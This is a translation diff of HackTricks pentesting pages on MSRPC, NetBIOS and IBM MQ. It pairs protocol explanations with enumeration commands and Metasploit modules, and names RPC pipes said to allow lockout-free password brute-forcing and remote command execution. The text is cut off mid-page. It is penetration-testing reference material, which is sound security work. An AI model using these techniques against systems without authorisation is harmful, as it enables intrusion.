[**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index c9deb019b..7b42d54e4 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -2,54 +2,50 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat begin en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -The Microsoft Remote Procedure Call (MSRPC) protocol, a client-server model enabling a program to request a service from a program located on another computer without understanding the network's specifics, was initially derived from open-source software and later developed and copyrighted by Microsoft. - -The RPC endpoint mapper can be accessed via TCP and UDP port 135, SMB on TCP 139 and 445 (with a null or authenticated session), and as a web service on TCP port 593. +Die Microsoft Remote Procedure Call (MSRPC) protokol, 'n klient-bedienermodel wat 'n program in staat stel om 'n diens van 'n program op 'n ander rekenaar aan te vra sonder om die spesifieke netwerk te verstaan, is aanvanklik afgelei van oopbron sagteware en later ontwikkel en gekopieer deur Microsoft. +Die RPC-eindpuntkartering kan benader word via TCP- en UDP-poort 135, SMB op TCP 139 en 445 (met 'n nul- of geauthentiseerde sessie), en as 'n webdiens op TCP-poort 593. ``` 135/tcp open msrpc Microsoft Windows RPC ``` +## Hoe werk MSRPC? -## How does MSRPC work? - -Initiated by the client application, the MSRPC process involves calling a local stub procedure that then interacts with the client runtime library to prepare and transmit the request to the server. This includes converting parameters into a standard Network Data Representation format. The choice of transport protocol is determined by the runtime library if the server is remote, ensuring the RPC is delivered through the network stack. +Geïnitieer deur die kliënttoepassing, behels die MSRPC-proses die oproep van 'n plaaslike stub-prosedure wat dan interaksie hê met die kliënt-runtime-biblioteek om die versoek voor te berei en oor te dra na die bediener. Dit sluit in die omskakeling van parameters na 'n standaard Netwerkdata-voorstelling-formaat. Die keuse van vervoerprotokol word bepaal deur die runtime-biblioteek as die bediener afgeleë is, om te verseker dat die RPC deur die netwerkstapel afgelewer word. ![https://0xffsec.com/handbook/images/msrpc.png](https://0xffsec.com/handbook/images/msrpc.png) -## **Identifying Exposed RPC Services** - - -Exposure of RPC services across TCP, UDP, HTTP, and SMB can be determined by querying the RPC locator service and individual endpoints. Tools such as rpcdump facilitate the identification of unique RPC services, denoted by **IFID** values, revealing service details and communication bindings: +## **Identifisering van Blootgestelde RPC-dienste** +Die blootstelling van RPC-dienste oor TCP, UDP, HTTP en SMB kan bepaal word deur die RPC-lokator-diens en individuele eindpunte te ondervra. Hulpmiddels soos rpcdump fasiliteer die identifisering van unieke RPC-dienste, aangedui deur **IFID**-waardes, wat diensbesonderhede en kommunikasiebindings openbaar: ``` D:\rpctools> rpcdump [-p port] **IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0 @@ -57,9 +53,7 @@ Annotation: Messenger Service UUID: 00000000-0000-0000-0000-000000000000 Binding: ncadg_ip_udp:[1028] ``` - -Access to the RPC locator service is enabled through specific protocols: ncacn\_ip\_tcp and ncadg\_ip\_udp for accessing via port 135, ncacn\_np for SMB connections, and ncacn\_http for web-based RPC communication. The following commands exemplify the utilization of Metasploit modules to audit and interact with MSRPC services, primarily focusing on port 135: - +Toegang tot die RPC-lokator-diens is moontlik deur spesifieke protokolle: ncacn\_ip\_tcp en ncadg\_ip\_udp vir toegang via poort 135, ncacn\_np vir SMB-verbindings, en ncacn\_http vir webgebaseerde RPC-kommunikasie. Die volgende opdragte illustreer die gebruik van Metasploit-modules om MSRPC-dienste te oudit en mee te skakel, met die klem op poort 135: ```bash use auxiliary/scanner/dcerpc/endpoint_mapper use auxiliary/scanner/dcerpc/hidden @@ -67,90 +61,89 @@ use auxiliary/scanner/dcerpc/management use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor rpcdump.py -p 135 ``` +Alle opsies behalwe `tcp_dcerpc_auditor` is spesifiek ontwerp vir die teiken van MSRPC op poort 135. -All options except `tcp_dcerpc_auditor` are specifically designed for targeting MSRPC on port 135. - -#### Notable RPC interfaces +#### Noemenswaardige RPC-koppelvlakke * **IFID**: 12345778-1234-abcd-ef00-0123456789ab -* **Named Pipe**: `\pipe\lsarpc` -* **Description**: LSA interface, used to enumerate users. +* **Genoemde Pyp**: `\pipe\lsarpc` +* **Beskrywing**: LSA-koppelvlak, gebruik om gebruikers op te som. * **IFID**: 3919286a-b10c-11d0-9ba8-00c04fd92ef5 -* **Named Pipe**: `\pipe\lsarpc` -* **Description**: LSA Directory Services (DS) interface, used to enumerate domains and trust relationships. +* **Genoemde Pyp**: `\pipe\lsarpc` +* **Beskrywing**: LSA Directory Services (DS) koppelvlak, gebruik om domeine en vertrouensverhoudings op te som. * **IFID**: 12345778-1234-abcd-ef00-0123456789ac -* **Named Pipe**: `\pipe\samr` -* **Description**: LSA SAMR interface, used to access public SAM database elements (e.g., usernames) and brute-force user passwords regardless of account lockout policy. +* **Genoemde Pyp**: `\pipe\samr` +* **Beskrywing**: LSA SAMR-koppelvlak, gebruik om openbare SAM-databasis-elemente (bv. gebruikersname) en gebruikerswagwoorde te kragtig, ongeag rekeningblokkeringbeleid. * **IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b -* **Named Pipe**: `\pipe\atsvc` -* **Description**: Task scheduler, used to remotely execute commands. +* **Genoemde Pyp**: `\pipe\atsvc` +* **Beskrywing**: Taakbeplanner, gebruik om opdragte op afstand uit te voer. * **IFID**: 338cd001-2244-31f1-aaaa-900038001003 -* **Named Pipe**: `\pipe\winreg` -* **Description**: Remote registry service, used to access and modify the system registry. +* **Genoemde Pyp**: `\pipe\winreg` +* **Beskrywing**: Diensbeheerder, gebruik om toegang tot en wysiging van die stelselregister te verkry. * **IFID**: 367abb81-9844-35f1-ad32-98f038001003 -* **Named Pipe**: `\pipe\svcctl` -* **Description**: Service control manager and server services, used to remotely start and stop services and execute commands. +* **Genoemde Pyp**: `\pipe\svcctl` +* **Beskrywing**: Diensbeheerder en bedienerdienste, gebruik om dienste op afstand te begin en te stop en opdragte uit te voer. * **IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188 -* **Named Pipe**: `\pipe\srvsvc` -* **Description**: Service control manager and server services, used to remotely start and stop services and execute commands. +* **Genoemde Pyp**: `\pipe\srvsvc` +* **Beskrywing**: Diensbeheerder en bedienerdienste, gebruik om dienste op afstand te begin en te stop en opdragte uit te voer. * **IFID**: 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 -* **Named Pipe**: `\pipe\epmapper` -* **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM. +* **Genoemde Pyp**: `\pipe\epmapper` +* **Beskrywing**: DCOM-koppelvlak, gebruik vir kragtige wagwoordkrag en inligtingversameling via WM. -### Identifying IP addresses +### Identifisering van IP-adresse -Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), comes from [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) is possible to abuse the _**ServerAlive2**_ method inside the _**IOXIDResolver**_ interface. +Deur [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver) te gebruik, afkomstig van [Airbus-navorsing](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/), is dit moontlik om die _**ServerAlive2**_-metode binne die _**IOXIDResolver**_-koppelvlak te misbruik. -This method has been used to get interface information as **IPv6** address from the HTB box _APT_. See [here](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) for 0xdf APT writeup, it includes an alternative method using rpcmap.py from [Impacket](https://github.com/SecureAuthCorp/impacket/) with _stringbinding_ (see above). +Hierdie metode is gebruik om koppelvlakinligting as **IPv6**-adres van die HTB-boks _APT_ te verkry. Sien [hier](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) vir 0xdf APT-verslag, dit sluit 'n alternatiewe metode in wat rpcmap.py van [Impacket](https://github.com/SecureAuthCorp/impacket/) met _stringbinding_ gebruik (sien hierbo). -## Port 593 +## Poort 593 -The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) can interact with this port. +Die **rpcdump.exe** van [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) kan met hierdie poort kommunikeer. -#​# References +#​# Verwysings * [https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) * [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/) * [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/)
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutvinders te kommunikeer! **Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +Raak betrokke by inhoud wat die opwinding en uitdagings van hackering ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige hackeringwêreld deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig oor die nuutste foutvindings wat bekendgestel word en noodsaaklike platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hackering van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hackeringtruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/137-138-139-pentesting-netbios.md b/network-services-pentesting/137-138-139-pentesting-netbios.md index f0a903857..d20070227 100644 --- a/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/network-services-pentesting/137-138-139-pentesting-netbios.md @@ -2,108 +2,100 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## NetBios Name Service +## NetBios Naamdiens -**NetBIOS Name Service** plays a crucial role, involving various services such as **name registration and resolution**, **datagram distribution**, and **session services**, utilizing specific ports for each service. +**NetBIOS Naamdiens** speel 'n belangrike rol en behels verskeie dienste soos **naamregistrasie en -oplossing**, **datagramverspreiding** en **sessiedienste**, wat spesifieke poorte vir elke diens gebruik. -[From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP): +[Vanaf Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP): -* Name service for name registration and resolution (ports: 137/udp and 137/tcp). -* Datagram distribution service for connectionless communication (port: 138/udp). -* Session service for connection-oriented communication (port: 139/tcp). +* Naamdiens vir naamregistrasie en -oplossing (poorte: 137/udp en 137/tcp). +* Datagramverspreidingsdiens vir verbindingslose kommunikasie (poort: 138/udp). +* Sessiediens vir verbindingsgeoriënteerde kommunikasie (poort: 139/tcp). -### Name Service - -For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a **broadcast process** where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a **Name Service server** can be queried directly to check for name availability or to resolve a name to an IP address. Tools like `nmblookup`, `nbtscan`, and `nmap` are utilized for enumerating NetBIOS services, revealing server names and MAC addresses. +### Naamdiens +Om 'n toestel aan 'n NetBIOS-netwerk te laat deelneem, moet dit 'n unieke naam hê. Dit word bereik deur 'n **uitsaaiingsproses** waar 'n "Naamnavraag" pakkie gestuur word. As geen besware ontvang word nie, word die naam as beskikbaar beskou. Alternatiewelik kan 'n **Naamdiens-bediener** direk ondervra word om naambeskikbaarheid te kontroleer of om 'n naam na 'n IP-adres op te los. Hulpmiddels soos `nmblookup`, `nbtscan` en `nmap` word gebruik om NetBIOS-dienste op te som, waardeur bedienername en MAC-adresse onthul word. ```bash PORT STATE SERVICE VERSION 137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP) ``` +### NetBIOS-dienste pentesting -Enumerating a NetBIOS service you can obtain the names the server is using and the MAC address of the server. - +By die ondersoek van 'n NetBIOS-diens kan jy die name verkry wat die bediener gebruik, sowel as die MAC-adres van die bediener. ```bash nmblookup -A nbtscan /30 sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n ``` +### Datagramverspreidingsdiens -### Datagram Distribution Service - -NetBIOS datagrams allow for connectionless communication via UDP, supporting direct messaging or broadcasting to all network names. This service uses port **138/udp**. - +NetBIOS-datagramme maak gebruik van UDP vir verbindingslose kommunikasie, wat direkte boodskappe of uitsaai na alle netwerkname ondersteun. Hierdie diens maak gebruik van poort **138/udp**. ```bash PORT STATE SERVICE VERSION 138/udp open|filtered netbios-dgm ``` +### Sessiediens -### Session Service +Vir verbindingsgeoriënteerde interaksies fasiliteer die **Sessiediens** 'n gesprek tussen twee toestelle deur gebruik te maak van **TCP**-verbindings deur poort **139/tcp**. 'n Sessie begin met 'n "Sessieversoek" pakkie en kan gevestig word op grond van die reaksie. Die diens ondersteun groter boodskappe, foutopsporing en herstel, met TCP wat vloeibeheer en pakkiehertransmissie hanteer. -For connection-oriented interactions, the **Session Service** facilitates a conversation between two devices, leveraging **TCP** connections through port **139/tcp**. A session begins with a "Session Request" packet and can be established based on the response. The service supports larger messages, error detection, and recovery, with TCP handling flow control and packet retransmission. - -Data transmission within a session involves **Session Message packets**, with sessions being terminated by closing the TCP connection. - -These services are integral to **NetBIOS** functionality, enabling efficient communication and resource sharing across a network. For more information on TCP and IP protocols, refer to their respective [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) and [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol) pages. +Data-oordrag binne 'n sessie behels **Sessieboodskappakkies**, met sessies wat beëindig word deur die TCP-verbinding te sluit. +Hierdie dienste is integraal tot die funksionaliteit van **NetBIOS**, wat doeltreffende kommunikasie en hulpbron-deling oor 'n netwerk moontlik maak. Vir meer inligting oor TCP- en IP-protokolle, verwys na hul onderskeie [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) en [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol) bladsye. ```bash PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn ``` - -**Read the next page to learn how to enumerate this service:** +**Lees die volgende bladsy om te leer hoe om hierdie diens te ondersoek:** {% content-ref url="137-138-139-pentesting-netbios.md" %} [137-138-139-pentesting-netbios.md](137-138-139-pentesting-netbios.md) {% endcontent-ref %} -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Netbios #Protocol Abbreviation if there is one. Port_Number: 137,138,139 #Comma separated if there is more than one. Protocol_Description: Netbios #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for NetBios - Note: | - Name service for name registration and resolution (ports: 137/udp and 137/tcp). - Datagram distribution service for connectionless communication (port: 138/udp). - Session service for connection-oriented communication (port: 139/tcp). +Name: Notes +Description: Notes for NetBios +Note: | +Name service for name registration and resolution (ports: 137/udp and 137/tcp). +Datagram distribution service for connectionless communication (port: 138/udp). +Session service for connection-oriented communication (port: 139/tcp). - For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address. +For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address. - https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios +https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios Entry_2: - Name: Find Names - Description: Three scans to find the names of the server - Command: nmblookup -A {IP} &&&& nbtscan {IP}/30 &&&& nmap -sU -sV -T4 --script nbstat.nse -p 137 -Pn -n {IP} +Name: Find Names +Description: Three scans to find the names of the server +Command: nmblookup -A {IP} &&&& nbtscan {IP}/30 &&&& nmap -sU -sV -T4 --script nbstat.nse -p 137 -Pn -n {IP} ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/1414-pentesting-ibmmq.md b/network-services-pentesting/1414-pentesting-ibmmq.md index 531f7a94f..1c4f59d65 100644 --- a/network-services-pentesting/1414-pentesting-ibmmq.md +++ b/network-services-pentesting/1414-pentesting-ibmmq.md @@ -2,108 +2,101 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Basic information +## Basiese inligting -IBM MQ is an IBM technology to manage message queues. As other **message broker** technologies, it is dedicated to receive, store, process and classify information between producers and consumers. +IBM MQ is 'n IBM-tegnologie om boodskaprye te bestuur. Soos ander **boodskapmakelaar**-tegnologieë, is dit toegewy aan die ontvang, stoor, verwerk en klassifiseer van inligting tussen produsente en verbruikers. -By default, **it exposes IBM MQ TCP port 1414**. -Sometimes, HTTP REST API can be exposed on port **9443**. -Metrics (Prometheus) could also be accessed from TCP port **9157**. +Standaard **stel dit IBM MQ TCP-poort 1414 bloot**. +Soms kan die HTTP REST API op poort **9443** blootgestel word. +Metriek (Prometheus) kan ook vanaf TCP-poort **9157** benader word. -The IBM MQ TCP port 1414 can be used to manipulate messages, queues, channels, ... but **also to control the instance**. +Die IBM MQ TCP-poort 1414 kan gebruik word om boodskappe, rykies, kanale, ... te manipuleer, maar **ook om die instansie te beheer**. -IBM provides a large technical documentation available on [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq). +IBM bied 'n groot tegniese dokumentasie aan wat beskikbaar is op [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq). -## Tools +## Gereedskap -A suggested tool for easy exploitation is **[punch-q](https://github.com/sensepost/punch-q)**, with Docker usage. The tool is actively using the Python library `pymqi`. +'n Voorgestelde gereedskap vir maklike uitbuiting is **[punch-q](https://github.com/sensepost/punch-q)**, met Docker-gebruik. Die gereedskap maak aktief gebruik van die Python-biblioteek `pymqi`. -For a more manual approach, use the Python library **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ dependencies](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) are needed. +Vir 'n meer handmatige benadering, gebruik die Python-biblioteek **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ-afhanklikhede](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) is nodig. -### Installing pymqi +### Installeer pymqi -**IBM MQ dependencies** needs to be installed and loaded: +**IBM MQ-afhanklikhede** moet geïnstalleer en gelaai word: -1. Create an account (IBMid) on [https://login.ibm.com/](https://login.ibm.com/). -2. Download IBM MQ libraries from 